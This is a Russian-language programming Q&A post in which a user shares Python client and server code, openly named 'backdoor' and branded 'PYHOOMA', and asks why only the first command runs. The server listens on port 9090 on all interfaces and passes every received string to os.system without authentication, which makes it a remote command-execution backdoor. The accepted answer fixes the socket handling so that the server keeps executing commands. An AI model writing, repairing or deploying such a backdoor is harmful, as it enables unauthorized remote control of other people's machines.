# У меня проблема с отправкой команд к серверной части

Tags: python, сокет

Я сделал код, клиентский и серверный. Проблема заключается в том что после отправки одной команды, последующие не выполняются.
Вот код клиента:

```
import socket
import os
from rich.console import Console
import time
from uuid import getnode as get_mac

console = Console()

def backdoor(port):
    sock = socket.socket()
    sock.connect(('localhost', port))
    def convert():
            comand = str(console.input('[bold green]>>>[/bold green]'))
            sock.send(bytes(comand, encoding='UTF-8'))
    while True:
        convert()
    data = sock.recv(1024)


console.print("""
██████╗░██╗░░░██╗██╗░░██╗░█████╗░░█████╗░███╗░░░███╗░█████╗░
██╔══██╗╚██╗░██╔╝██║░░██║██╔══██╗██╔══██╗████╗░████║██╔══██╗
██████╔╝░╚████╔╝░███████║██║░░██║██║░░██║██╔████╔██║███████║
██╔═══╝░░░╚██╔╝░░██╔══██║██║░░██║██║░░██║██║╚██╔╝██║██╔══██║
██║░░░░░░░░██║░░░██║░░██║╚█████╔╝╚█████╔╝██║░╚═╝░██║██║░░██║
╚═╝░░░░░░░░╚═╝░░░╚═╝░░╚═╝░╚════╝░░╚════╝░╚═╝░░░░░╚═╝╚═╝░░╚═╝""", style='cyan', justify='center')
console.print('[bold green]WELCOME TO THE PYHOOMA![/bold green] \n[bold magenta]DO YO WANNA START?(Y/N)[/bold magenta]', justify='center')

yorn = input('')
 
if yorn == 'y' or yorn == 'Y':

    console.print('PORT:', style='magenta')

    port = int(console.input('[bold green]>>>[/bold green]'))
    while True:
        backdoor(port)

elif yorn == 'n' or yorn == 'N':
    console.print('OKAY, QUITING..', style='red')

    time.sleep(4)

    quit()

else:
    console.print('UNKNOWN COMAND \nQUITING..', style='red')
    time.sleep(4)
    quit()
```

а вот сервер:

```
import os
import socket
import time
from rich.console import Console

def backdoor():
    while True:
        sock = socket.socket()
        sock.bind(('', 9090))
        sock.listen(3)
        conn, addr = sock.accept()
        data = conn.recv(1024)

        if not data:
            continue

        data1 = str(data)
        data2 = data1.replace('b', '', 1)
        dataFin = data2.replace("'", '', 2)
        os.system(dataFin)

while True:
    backdoor()
```

В чём именно проблема я не знаю, оно работает, но не работает

Comment: Пожалуйста, уточните вашу конкретную проблему или приведите более подробную информацию о том, что именно вам нужно. В текущем виде сложно понять, что именно вы спрашиваете.

Answer (score 0, accepted):

Измените функцию backdoor на "сервере":

```
def backdoor():
    sock = socket.socket()
    sock.bind(('', 9090))
    sock.listen(3)
    conn, addr = sock.accept()
    while True:
        data = conn.recv(1024)
        data1 = str(data)
        data2 = data1.replace('b', '', 1)
        dataFin = data2.replace("'", '', 2)
        res = os.system(dataFin)
```

и команды не перестанут выполнятся. но замечу, что в целом код требует корректировки. но на Ваш вопрос ответил.

Проблема была в том что Вы постоянно переопределяли сокет на стороне "сервера", а пользователь не переподключался к нему.